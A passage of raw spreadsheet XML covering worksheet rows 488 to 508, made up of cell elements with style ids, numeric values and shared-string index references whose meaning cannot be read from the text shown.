      </c>
      <c r="AD488" s="5"/>
      <c r="AE488" s="14"/>
      <c r="AF488" s="14"/>
    </row>
    <row r="489">
      <c r="A489" s="6">
        <f t="shared" si="1"/>
        <v>0.3815558642</v>
      </c>
      <c r="B489" s="29">
        <v>1.0</v>
      </c>
      <c r="C489" s="29">
        <v>87232.0</v>
      </c>
      <c r="D489" s="14"/>
      <c r="E489" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F489" s="14"/>
      <c r="G489" s="29">
        <v>1.0</v>
      </c>
      <c r="H489" s="29">
        <v>111.0</v>
      </c>
      <c r="I489" s="29">
        <v>44680.0</v>
      </c>
      <c r="J489" s="15"/>
      <c r="K489" s="15"/>
      <c r="L489" s="15"/>
      <c r="M489" s="14"/>
      <c r="N489" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O489" s="29">
        <v>1.0</v>
      </c>
      <c r="P489" s="29">
        <v>0.0</v>
      </c>
      <c r="Q489" s="15"/>
      <c r="R489" s="15"/>
      <c r="S489" s="15"/>
      <c r="T489" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U489" s="5"/>
      <c r="V489" s="5"/>
      <c r="W489" s="47"/>
      <c r="X489" s="45"/>
      <c r="Y489" s="45"/>
      <c r="Z489" s="38" t="s">
        <v>2518</v>
      </c>
      <c r="AA489" s="39" t="s">
        <v>2519</v>
      </c>
      <c r="AB489" s="38" t="s">
        <v>2520</v>
      </c>
      <c r="AC489" s="40">
        <v>87230.0</v>
      </c>
      <c r="AD489" s="5"/>
      <c r="AE489" s="14"/>
      <c r="AF489" s="14"/>
    </row>
    <row r="490">
      <c r="A490" s="6">
        <f t="shared" si="1"/>
        <v>0.4276515545</v>
      </c>
      <c r="B490" s="29">
        <v>1.0</v>
      </c>
      <c r="C490" s="15"/>
      <c r="D490" s="14"/>
      <c r="E490" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F490" s="14"/>
      <c r="G490" s="29">
        <v>-3.0</v>
      </c>
      <c r="H490" s="29">
        <v>165.0</v>
      </c>
      <c r="I490" s="29">
        <v>161286.0</v>
      </c>
      <c r="J490" s="15"/>
      <c r="K490" s="29">
        <v>161286.0</v>
      </c>
      <c r="L490" s="15"/>
      <c r="M490" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N490" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O490" s="29">
        <v>3.0</v>
      </c>
      <c r="P490" s="29">
        <v>2.0</v>
      </c>
      <c r="Q490" s="15"/>
      <c r="R490" s="36" t="s">
        <v>30</v>
      </c>
      <c r="S490" s="15"/>
      <c r="T490" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U490" s="5"/>
      <c r="V490" s="5"/>
      <c r="W490" s="47"/>
      <c r="X490" s="45"/>
      <c r="Y490" s="45"/>
      <c r="Z490" s="38" t="s">
        <v>2521</v>
      </c>
      <c r="AA490" s="39" t="s">
        <v>2522</v>
      </c>
      <c r="AB490" s="38" t="s">
        <v>2523</v>
      </c>
      <c r="AC490" s="40">
        <v>171680.0</v>
      </c>
      <c r="AD490" s="5"/>
      <c r="AE490" s="14"/>
      <c r="AF490" s="14"/>
    </row>
    <row r="491">
      <c r="A491" s="6">
        <f t="shared" si="1"/>
        <v>0.2404619324</v>
      </c>
      <c r="B491" s="29">
        <v>1.0</v>
      </c>
      <c r="C491" s="29">
        <v>141928.0</v>
      </c>
      <c r="D491" s="14"/>
      <c r="E491" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F491" s="14"/>
      <c r="G491" s="29">
        <v>23.0</v>
      </c>
      <c r="H491" s="29">
        <v>2030.0</v>
      </c>
      <c r="I491" s="29">
        <v>80238.0</v>
      </c>
      <c r="J491" s="15"/>
      <c r="K491" s="29">
        <v>12139.0</v>
      </c>
      <c r="L491" s="15"/>
      <c r="M491" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N491" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O491" s="29">
        <v>2.0</v>
      </c>
      <c r="P491" s="29">
        <v>5.0</v>
      </c>
      <c r="Q491" s="15"/>
      <c r="R491" s="36" t="s">
        <v>30</v>
      </c>
      <c r="S491" s="15"/>
      <c r="T491" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U491" s="5"/>
      <c r="V491" s="5"/>
      <c r="W491" s="47"/>
      <c r="X491" s="45"/>
      <c r="Y491" s="45"/>
      <c r="Z491" s="38" t="s">
        <v>2524</v>
      </c>
      <c r="AA491" s="39" t="s">
        <v>2525</v>
      </c>
      <c r="AB491" s="38" t="s">
        <v>2526</v>
      </c>
      <c r="AC491" s="40">
        <v>141925.0</v>
      </c>
      <c r="AD491" s="5"/>
      <c r="AE491" s="14"/>
      <c r="AF491" s="14"/>
    </row>
    <row r="492">
      <c r="A492" s="6">
        <f t="shared" si="1"/>
        <v>0.6090013213</v>
      </c>
      <c r="B492" s="29">
        <v>1.0</v>
      </c>
      <c r="C492" s="29">
        <v>210127.0</v>
      </c>
      <c r="D492" s="14"/>
      <c r="E492" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F492" s="14"/>
      <c r="G492" s="29">
        <v>1.0</v>
      </c>
      <c r="H492" s="29">
        <v>193.0</v>
      </c>
      <c r="I492" s="29">
        <v>171435.0</v>
      </c>
      <c r="J492" s="15"/>
      <c r="K492" s="29">
        <v>171435.0</v>
      </c>
      <c r="L492" s="15"/>
      <c r="M492" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N492" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O492" s="29">
        <v>1.0</v>
      </c>
      <c r="P492" s="29">
        <v>0.0</v>
      </c>
      <c r="Q492" s="15"/>
      <c r="R492" s="15"/>
      <c r="S492" s="15"/>
      <c r="T492" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U492" s="5"/>
      <c r="V492" s="5"/>
      <c r="W492" s="47"/>
      <c r="X492" s="45"/>
      <c r="Y492" s="45"/>
      <c r="Z492" s="38" t="s">
        <v>2527</v>
      </c>
      <c r="AA492" s="39" t="s">
        <v>2528</v>
      </c>
      <c r="AB492" s="38" t="s">
        <v>395</v>
      </c>
      <c r="AC492" s="40">
        <v>210119.0</v>
      </c>
      <c r="AD492" s="5"/>
      <c r="AE492" s="14"/>
      <c r="AF492" s="14"/>
    </row>
    <row r="493">
      <c r="A493" s="6">
        <f t="shared" si="1"/>
        <v>0.1840332482</v>
      </c>
      <c r="B493" s="29">
        <v>1.0</v>
      </c>
      <c r="C493" s="15"/>
      <c r="D493" s="14"/>
      <c r="E493" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F493" s="14"/>
      <c r="G493" s="29">
        <v>4.0</v>
      </c>
      <c r="H493" s="29">
        <v>4364.0</v>
      </c>
      <c r="I493" s="29">
        <v>7030.0</v>
      </c>
      <c r="J493" s="15"/>
      <c r="K493" s="29">
        <v>7030.0</v>
      </c>
      <c r="L493" s="15"/>
      <c r="M493" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N493" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O493" s="29">
        <v>1.0</v>
      </c>
      <c r="P493" s="29">
        <v>3.0</v>
      </c>
      <c r="Q493" s="15"/>
      <c r="R493" s="15"/>
      <c r="S493" s="15"/>
      <c r="T493" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U493" s="5"/>
      <c r="V493" s="5"/>
      <c r="W493" s="47"/>
      <c r="X493" s="45"/>
      <c r="Y493" s="45"/>
      <c r="Z493" s="38" t="s">
        <v>2529</v>
      </c>
      <c r="AA493" s="39" t="s">
        <v>2530</v>
      </c>
      <c r="AB493" s="38" t="s">
        <v>2531</v>
      </c>
      <c r="AC493" s="40">
        <v>39479.0</v>
      </c>
      <c r="AD493" s="5"/>
      <c r="AE493" s="14"/>
      <c r="AF493" s="14"/>
    </row>
    <row r="494">
      <c r="A494" s="6">
        <f t="shared" si="1"/>
        <v>0.2127283309</v>
      </c>
      <c r="B494" s="29">
        <v>1.0</v>
      </c>
      <c r="C494" s="14"/>
      <c r="D494" s="14"/>
      <c r="E494" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F494" s="14"/>
      <c r="G494" s="29">
        <v>0.0</v>
      </c>
      <c r="H494" s="29">
        <v>167.0</v>
      </c>
      <c r="I494" s="29">
        <v>201877.0</v>
      </c>
      <c r="J494" s="15"/>
      <c r="K494" s="15"/>
      <c r="L494" s="15"/>
      <c r="M494" s="14"/>
      <c r="N494" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O494" s="29">
        <v>2.0</v>
      </c>
      <c r="P494" s="29">
        <v>1.0</v>
      </c>
      <c r="Q494" s="15"/>
      <c r="R494" s="15"/>
      <c r="S494" s="15"/>
      <c r="T494" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U494" s="5"/>
      <c r="V494" s="5"/>
      <c r="W494" s="47"/>
      <c r="X494" s="45"/>
      <c r="Y494" s="45"/>
      <c r="Z494" s="38" t="s">
        <v>2532</v>
      </c>
      <c r="AA494" s="39" t="s">
        <v>2533</v>
      </c>
      <c r="AB494" s="38" t="s">
        <v>2534</v>
      </c>
      <c r="AC494" s="40">
        <v>205321.0</v>
      </c>
      <c r="AD494" s="5"/>
      <c r="AE494" s="14"/>
      <c r="AF494" s="14"/>
    </row>
    <row r="495">
      <c r="A495" s="6">
        <f t="shared" si="1"/>
        <v>0.8180328423</v>
      </c>
      <c r="B495" s="29">
        <v>1.0</v>
      </c>
      <c r="C495" s="29">
        <v>135443.0</v>
      </c>
      <c r="D495" s="14"/>
      <c r="E495" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F495" s="14"/>
      <c r="G495" s="29">
        <v>1.0</v>
      </c>
      <c r="H495" s="29">
        <v>167.0</v>
      </c>
      <c r="I495" s="29">
        <v>55590.0</v>
      </c>
      <c r="J495" s="15"/>
      <c r="K495" s="29">
        <v>59575.0</v>
      </c>
      <c r="L495" s="15"/>
      <c r="M495" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N495" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O495" s="29">
        <v>1.0</v>
      </c>
      <c r="P495" s="29">
        <v>3.0</v>
      </c>
      <c r="Q495" s="15"/>
      <c r="R495" s="15"/>
      <c r="S495" s="15"/>
      <c r="T495" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U495" s="5"/>
      <c r="V495" s="5"/>
      <c r="W495" s="47"/>
      <c r="X495" s="45"/>
      <c r="Y495" s="45"/>
      <c r="Z495" s="38" t="s">
        <v>2535</v>
      </c>
      <c r="AA495" s="39" t="s">
        <v>2536</v>
      </c>
      <c r="AB495" s="38" t="s">
        <v>2537</v>
      </c>
      <c r="AC495" s="40">
        <v>135438.0</v>
      </c>
      <c r="AD495" s="5"/>
      <c r="AE495" s="14"/>
      <c r="AF495" s="14"/>
    </row>
    <row r="496">
      <c r="A496" s="6">
        <f t="shared" si="1"/>
        <v>0.3365706297</v>
      </c>
      <c r="B496" s="29">
        <v>1.0</v>
      </c>
      <c r="C496" s="29">
        <v>135482.0</v>
      </c>
      <c r="D496" s="14"/>
      <c r="E496" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F496" s="14"/>
      <c r="G496" s="29">
        <v>2.0</v>
      </c>
      <c r="H496" s="29">
        <v>193.0</v>
      </c>
      <c r="I496" s="29">
        <v>91253.0</v>
      </c>
      <c r="J496" s="15"/>
      <c r="K496" s="29">
        <v>764.0</v>
      </c>
      <c r="L496" s="15"/>
      <c r="M496" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N496" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O496" s="29">
        <v>3.0</v>
      </c>
      <c r="P496" s="29">
        <v>9.0</v>
      </c>
      <c r="Q496" s="15"/>
      <c r="R496" s="15"/>
      <c r="S496" s="15"/>
      <c r="T496" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U496" s="5"/>
      <c r="V496" s="5"/>
      <c r="W496" s="47"/>
      <c r="X496" s="45"/>
      <c r="Y496" s="45"/>
      <c r="Z496" s="38" t="s">
        <v>2538</v>
      </c>
      <c r="AA496" s="39" t="s">
        <v>2539</v>
      </c>
      <c r="AB496" s="38" t="s">
        <v>1777</v>
      </c>
      <c r="AC496" s="40">
        <v>135478.0</v>
      </c>
      <c r="AD496" s="5"/>
      <c r="AE496" s="14"/>
      <c r="AF496" s="14"/>
    </row>
    <row r="497">
      <c r="A497" s="6">
        <f t="shared" si="1"/>
        <v>0.7972747592</v>
      </c>
      <c r="B497" s="29">
        <v>1.0</v>
      </c>
      <c r="C497" s="15"/>
      <c r="D497" s="14"/>
      <c r="E497" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F497" s="14"/>
      <c r="G497" s="29">
        <v>1.0</v>
      </c>
      <c r="H497" s="29">
        <v>147.0</v>
      </c>
      <c r="I497" s="29">
        <v>54170.0</v>
      </c>
      <c r="J497" s="15"/>
      <c r="K497" s="29">
        <v>-1.0</v>
      </c>
      <c r="L497" s="15"/>
      <c r="M497" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N497" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O497" s="29">
        <v>0.0</v>
      </c>
      <c r="P497" s="29">
        <v>7.0</v>
      </c>
      <c r="Q497" s="15"/>
      <c r="R497" s="36" t="s">
        <v>30</v>
      </c>
      <c r="S497" s="15"/>
      <c r="T497" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U497" s="5"/>
      <c r="V497" s="5"/>
      <c r="W497" s="47"/>
      <c r="X497" s="45"/>
      <c r="Y497" s="45"/>
      <c r="Z497" s="38" t="s">
        <v>2540</v>
      </c>
      <c r="AA497" s="39" t="s">
        <v>2541</v>
      </c>
      <c r="AB497" s="38" t="s">
        <v>2542</v>
      </c>
      <c r="AC497" s="40">
        <v>131310.0</v>
      </c>
      <c r="AD497" s="5"/>
      <c r="AE497" s="14"/>
      <c r="AF497" s="14"/>
    </row>
    <row r="498">
      <c r="A498" s="6">
        <f t="shared" si="1"/>
        <v>0.9344987907</v>
      </c>
      <c r="B498" s="29">
        <v>1.0</v>
      </c>
      <c r="C498" s="29">
        <v>244245.0</v>
      </c>
      <c r="D498" s="14"/>
      <c r="E498" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F498" s="14"/>
      <c r="G498" s="29">
        <v>16.0</v>
      </c>
      <c r="H498" s="29">
        <v>3696.0</v>
      </c>
      <c r="I498" s="29">
        <v>7247.0</v>
      </c>
      <c r="J498" s="15"/>
      <c r="K498" s="29">
        <v>37315.0</v>
      </c>
      <c r="L498" s="15"/>
      <c r="M498" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N498" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O498" s="29">
        <v>1.0</v>
      </c>
      <c r="P498" s="29">
        <v>12.0</v>
      </c>
      <c r="Q498" s="15"/>
      <c r="R498" s="15"/>
      <c r="S498" s="15"/>
      <c r="T498" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U498" s="5"/>
      <c r="V498" s="5"/>
      <c r="W498" s="47"/>
      <c r="X498" s="45"/>
      <c r="Y498" s="45"/>
      <c r="Z498" s="38" t="s">
        <v>2543</v>
      </c>
      <c r="AA498" s="39" t="s">
        <v>2544</v>
      </c>
      <c r="AB498" s="38" t="s">
        <v>395</v>
      </c>
      <c r="AC498" s="40">
        <v>244238.0</v>
      </c>
      <c r="AD498" s="5"/>
      <c r="AE498" s="14"/>
      <c r="AF498" s="14"/>
    </row>
    <row r="499">
      <c r="A499" s="6">
        <f t="shared" si="1"/>
        <v>0.7628492046</v>
      </c>
      <c r="B499" s="29">
        <v>1.0</v>
      </c>
      <c r="C499" s="29">
        <v>169089.0</v>
      </c>
      <c r="D499" s="14"/>
      <c r="E499" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F499" s="14"/>
      <c r="G499" s="29">
        <v>9.0</v>
      </c>
      <c r="H499" s="29">
        <v>1536.0</v>
      </c>
      <c r="I499" s="29">
        <v>105533.0</v>
      </c>
      <c r="J499" s="15"/>
      <c r="K499" s="29">
        <v>-1.0</v>
      </c>
      <c r="L499" s="15"/>
      <c r="M499" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N499" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O499" s="29">
        <v>2.0</v>
      </c>
      <c r="P499" s="29">
        <v>0.0</v>
      </c>
      <c r="Q499" s="15"/>
      <c r="R499" s="15"/>
      <c r="S499" s="15"/>
      <c r="T499" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U499" s="5"/>
      <c r="V499" s="5"/>
      <c r="W499" s="47"/>
      <c r="X499" s="45"/>
      <c r="Y499" s="45"/>
      <c r="Z499" s="38" t="s">
        <v>2545</v>
      </c>
      <c r="AA499" s="39" t="s">
        <v>2546</v>
      </c>
      <c r="AB499" s="38" t="s">
        <v>2547</v>
      </c>
      <c r="AC499" s="40">
        <v>168940.0</v>
      </c>
      <c r="AD499" s="5"/>
      <c r="AE499" s="14"/>
      <c r="AF499" s="14"/>
    </row>
    <row r="500">
      <c r="A500" s="6">
        <f t="shared" si="1"/>
        <v>0.08966075994</v>
      </c>
      <c r="B500" s="29">
        <v>1.0</v>
      </c>
      <c r="C500" s="15"/>
      <c r="D500" s="14"/>
      <c r="E500" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F500" s="14"/>
      <c r="G500" s="29">
        <v>0.0</v>
      </c>
      <c r="H500" s="29">
        <v>2542.0</v>
      </c>
      <c r="I500" s="29">
        <v>223532.0</v>
      </c>
      <c r="J500" s="15"/>
      <c r="K500" s="29">
        <v>6253.0</v>
      </c>
      <c r="L500" s="14"/>
      <c r="M500" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N500" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O500" s="29">
        <v>1.0</v>
      </c>
      <c r="P500" s="29">
        <v>4.0</v>
      </c>
      <c r="Q500" s="15"/>
      <c r="R500" s="36" t="s">
        <v>30</v>
      </c>
      <c r="S500" s="15"/>
      <c r="T500" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U500" s="5"/>
      <c r="V500" s="5"/>
      <c r="W500" s="47"/>
      <c r="X500" s="45"/>
      <c r="Y500" s="45"/>
      <c r="Z500" s="38" t="s">
        <v>2548</v>
      </c>
      <c r="AA500" s="39" t="s">
        <v>2549</v>
      </c>
      <c r="AB500" s="38" t="s">
        <v>2550</v>
      </c>
      <c r="AC500" s="40">
        <v>222892.0</v>
      </c>
      <c r="AD500" s="5"/>
      <c r="AE500" s="14"/>
      <c r="AF500" s="14"/>
    </row>
    <row r="501">
      <c r="A501" s="6">
        <f t="shared" si="1"/>
        <v>0.4173952805</v>
      </c>
      <c r="B501" s="29">
        <v>1.0</v>
      </c>
      <c r="C501" s="15"/>
      <c r="D501" s="14"/>
      <c r="E501" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F501" s="14"/>
      <c r="G501" s="29">
        <v>2.0</v>
      </c>
      <c r="H501" s="29">
        <v>186.0</v>
      </c>
      <c r="I501" s="29">
        <v>49455.0</v>
      </c>
      <c r="J501" s="15"/>
      <c r="K501" s="29">
        <v>49455.0</v>
      </c>
      <c r="L501" s="15"/>
      <c r="M501" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N501" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O501" s="29">
        <v>2.0</v>
      </c>
      <c r="P501" s="29">
        <v>1.0</v>
      </c>
      <c r="Q501" s="15"/>
      <c r="R501" s="15"/>
      <c r="S501" s="15"/>
      <c r="T501" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U501" s="5"/>
      <c r="V501" s="5"/>
      <c r="W501" s="47"/>
      <c r="X501" s="45"/>
      <c r="Y501" s="45"/>
      <c r="Z501" s="38" t="s">
        <v>2551</v>
      </c>
      <c r="AA501" s="39" t="s">
        <v>2552</v>
      </c>
      <c r="AB501" s="38" t="s">
        <v>2553</v>
      </c>
      <c r="AC501" s="40">
        <v>126943.0</v>
      </c>
      <c r="AD501" s="5"/>
      <c r="AE501" s="14"/>
      <c r="AF501" s="14"/>
    </row>
    <row r="502">
      <c r="A502" s="6">
        <f t="shared" si="1"/>
        <v>0.7788590433</v>
      </c>
      <c r="B502" s="29">
        <v>1.0</v>
      </c>
      <c r="C502" s="15"/>
      <c r="D502" s="14"/>
      <c r="E502" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F502" s="14"/>
      <c r="G502" s="29">
        <v>10.0</v>
      </c>
      <c r="H502" s="29">
        <v>7532.0</v>
      </c>
      <c r="I502" s="29">
        <v>103879.0</v>
      </c>
      <c r="J502" s="15"/>
      <c r="K502" s="29">
        <v>-1.0</v>
      </c>
      <c r="L502" s="15"/>
      <c r="M502" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N502" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O502" s="29">
        <v>2.0</v>
      </c>
      <c r="P502" s="29">
        <v>8.0</v>
      </c>
      <c r="Q502" s="15"/>
      <c r="R502" s="15"/>
      <c r="S502" s="15"/>
      <c r="T502" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U502" s="5"/>
      <c r="V502" s="5"/>
      <c r="W502" s="47"/>
      <c r="X502" s="45"/>
      <c r="Y502" s="45"/>
      <c r="Z502" s="38" t="s">
        <v>2554</v>
      </c>
      <c r="AA502" s="39" t="s">
        <v>2555</v>
      </c>
      <c r="AB502" s="38" t="s">
        <v>2556</v>
      </c>
      <c r="AC502" s="40">
        <v>116929.0</v>
      </c>
      <c r="AD502" s="5"/>
      <c r="AE502" s="14"/>
      <c r="AF502" s="14"/>
    </row>
    <row r="503">
      <c r="A503" s="6">
        <f t="shared" si="1"/>
        <v>0.8787649662</v>
      </c>
      <c r="B503" s="29">
        <v>1.0</v>
      </c>
      <c r="C503" s="29">
        <v>83646.0</v>
      </c>
      <c r="D503" s="14"/>
      <c r="E503" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F503" s="14"/>
      <c r="G503" s="29">
        <v>8.0</v>
      </c>
      <c r="H503" s="29">
        <v>1391.0</v>
      </c>
      <c r="I503" s="15"/>
      <c r="J503" s="5" t="s">
        <v>2557</v>
      </c>
      <c r="K503" s="29">
        <v>-1.0</v>
      </c>
      <c r="L503" s="15"/>
      <c r="M503" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N503" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O503" s="29">
        <v>2.0</v>
      </c>
      <c r="P503" s="29">
        <v>1.0</v>
      </c>
      <c r="Q503" s="15"/>
      <c r="R503" s="15"/>
      <c r="S503" s="15"/>
      <c r="T503" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U503" s="5"/>
      <c r="V503" s="5"/>
      <c r="W503" s="47"/>
      <c r="X503" s="45"/>
      <c r="Y503" s="45"/>
      <c r="Z503" s="38" t="s">
        <v>2558</v>
      </c>
      <c r="AA503" s="39" t="s">
        <v>2559</v>
      </c>
      <c r="AB503" s="38" t="s">
        <v>2560</v>
      </c>
      <c r="AC503" s="40">
        <v>83645.0</v>
      </c>
      <c r="AD503" s="5"/>
      <c r="AE503" s="14"/>
      <c r="AF503" s="14"/>
    </row>
    <row r="504">
      <c r="A504" s="6">
        <f t="shared" si="1"/>
        <v>0.6425248645</v>
      </c>
      <c r="B504" s="29">
        <v>1.0</v>
      </c>
      <c r="C504" s="15"/>
      <c r="D504" s="14"/>
      <c r="E504" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F504" s="14"/>
      <c r="G504" s="29">
        <v>-1.0</v>
      </c>
      <c r="H504" s="29">
        <v>227.0</v>
      </c>
      <c r="I504" s="29">
        <v>191261.0</v>
      </c>
      <c r="J504" s="15"/>
      <c r="K504" s="29">
        <v>191261.0</v>
      </c>
      <c r="L504" s="15"/>
      <c r="M504" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N504" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O504" s="29">
        <v>1.0</v>
      </c>
      <c r="P504" s="29">
        <v>0.0</v>
      </c>
      <c r="Q504" s="15"/>
      <c r="R504" s="36" t="s">
        <v>30</v>
      </c>
      <c r="S504" s="15"/>
      <c r="T504" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U504" s="5"/>
      <c r="V504" s="5"/>
      <c r="W504" s="47"/>
      <c r="X504" s="45"/>
      <c r="Y504" s="45"/>
      <c r="Z504" s="38" t="s">
        <v>2561</v>
      </c>
      <c r="AA504" s="39" t="s">
        <v>2562</v>
      </c>
      <c r="AB504" s="38" t="s">
        <v>2563</v>
      </c>
      <c r="AC504" s="40">
        <v>197628.0</v>
      </c>
      <c r="AD504" s="5"/>
      <c r="AE504" s="14"/>
      <c r="AF504" s="14"/>
    </row>
    <row r="505">
      <c r="A505" s="6">
        <f t="shared" si="1"/>
        <v>0.525971879</v>
      </c>
      <c r="B505" s="29">
        <v>1.0</v>
      </c>
      <c r="C505" s="29">
        <v>121950.0</v>
      </c>
      <c r="D505" s="14"/>
      <c r="E505" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F505" s="14"/>
      <c r="G505" s="29">
        <v>11.0</v>
      </c>
      <c r="H505" s="29">
        <v>11421.0</v>
      </c>
      <c r="I505" s="29">
        <v>102510.0</v>
      </c>
      <c r="J505" s="15"/>
      <c r="K505" s="29">
        <v>98538.0</v>
      </c>
      <c r="L505" s="15"/>
      <c r="M505" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N505" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O505" s="29">
        <v>3.0</v>
      </c>
      <c r="P505" s="29">
        <v>1.0</v>
      </c>
      <c r="Q505" s="15"/>
      <c r="R505" s="15"/>
      <c r="S505" s="15"/>
      <c r="T505" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U505" s="5"/>
      <c r="V505" s="5"/>
      <c r="W505" s="47"/>
      <c r="X505" s="45"/>
      <c r="Y505" s="45"/>
      <c r="Z505" s="38" t="s">
        <v>2564</v>
      </c>
      <c r="AA505" s="39" t="s">
        <v>2565</v>
      </c>
      <c r="AB505" s="38" t="s">
        <v>2566</v>
      </c>
      <c r="AC505" s="40">
        <v>121097.0</v>
      </c>
      <c r="AD505" s="5"/>
      <c r="AE505" s="14"/>
      <c r="AF505" s="14"/>
    </row>
    <row r="506">
      <c r="A506" s="6">
        <f t="shared" si="1"/>
        <v>0.2880419883</v>
      </c>
      <c r="B506" s="29">
        <v>1.0</v>
      </c>
      <c r="C506" s="29">
        <v>262575.0</v>
      </c>
      <c r="D506" s="14"/>
      <c r="E506" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F506" s="14"/>
      <c r="G506" s="29">
        <v>1.0</v>
      </c>
      <c r="H506" s="29">
        <v>108.0</v>
      </c>
      <c r="I506" s="29">
        <v>238174.0</v>
      </c>
      <c r="J506" s="15"/>
      <c r="K506" s="15"/>
      <c r="L506" s="15"/>
      <c r="M506" s="15"/>
      <c r="N506" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O506" s="29">
        <v>1.0</v>
      </c>
      <c r="P506" s="29">
        <v>0.0</v>
      </c>
      <c r="Q506" s="15"/>
      <c r="R506" s="15"/>
      <c r="S506" s="15"/>
      <c r="T506" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U506" s="5"/>
      <c r="V506" s="5"/>
      <c r="W506" s="47"/>
      <c r="X506" s="45"/>
      <c r="Y506" s="45"/>
      <c r="Z506" s="38" t="s">
        <v>2567</v>
      </c>
      <c r="AA506" s="39" t="s">
        <v>2568</v>
      </c>
      <c r="AB506" s="38" t="s">
        <v>488</v>
      </c>
      <c r="AC506" s="40">
        <v>262574.0</v>
      </c>
      <c r="AD506" s="5"/>
      <c r="AE506" s="14"/>
      <c r="AF506" s="14"/>
    </row>
    <row r="507">
      <c r="A507" s="6">
        <f t="shared" si="1"/>
        <v>0.5663378386</v>
      </c>
      <c r="B507" s="29">
        <v>1.0</v>
      </c>
      <c r="C507" s="15"/>
      <c r="D507" s="14"/>
      <c r="E507" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F507" s="14"/>
      <c r="G507" s="29">
        <v>3.0</v>
      </c>
      <c r="H507" s="29">
        <v>192.0</v>
      </c>
      <c r="I507" s="29">
        <v>151667.0</v>
      </c>
      <c r="J507" s="15"/>
      <c r="K507" s="15"/>
      <c r="L507" s="15"/>
      <c r="M507" s="14"/>
      <c r="N507" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O507" s="29">
        <v>2.0</v>
      </c>
      <c r="P507" s="29">
        <v>0.0</v>
      </c>
      <c r="Q507" s="15"/>
      <c r="R507" s="15"/>
      <c r="S507" s="15"/>
      <c r="T507" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U507" s="5"/>
      <c r="V507" s="5"/>
      <c r="W507" s="47"/>
      <c r="X507" s="45"/>
      <c r="Y507" s="45"/>
      <c r="Z507" s="38" t="s">
        <v>2569</v>
      </c>
      <c r="AA507" s="39" t="s">
        <v>2570</v>
      </c>
      <c r="AB507" s="38" t="s">
        <v>2571</v>
      </c>
      <c r="AC507" s="40">
        <v>162567.0</v>
      </c>
      <c r="AD507" s="5"/>
      <c r="AE507" s="14"/>
      <c r="AF507" s="14"/>
    </row>
    <row r="508">
      <c r="A508" s="6">
        <f t="shared" si="1"/>
        <v>0.6784779596</v>
      </c>
      <c r="B508" s="29">
        <v>1.0</v>
      </c>
      <c r="C508" s="29">
        <v>245099.0</v>
      </c>
      <c r="D508" s="14"/>
      <c r="E508" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F508" s="14"/>
      <c r="G508" s="29">
        <v>1.0</v>
      </c>
      <c r="H508" s="29">
        <v>180.0</v>
      </c>
      <c r="I508" s="29">
        <v>193390.0</v>
      </c>
      <c r="J508" s="15"/>
      <c r="K508" s="29">
        <v>193390.0</v>
      </c>
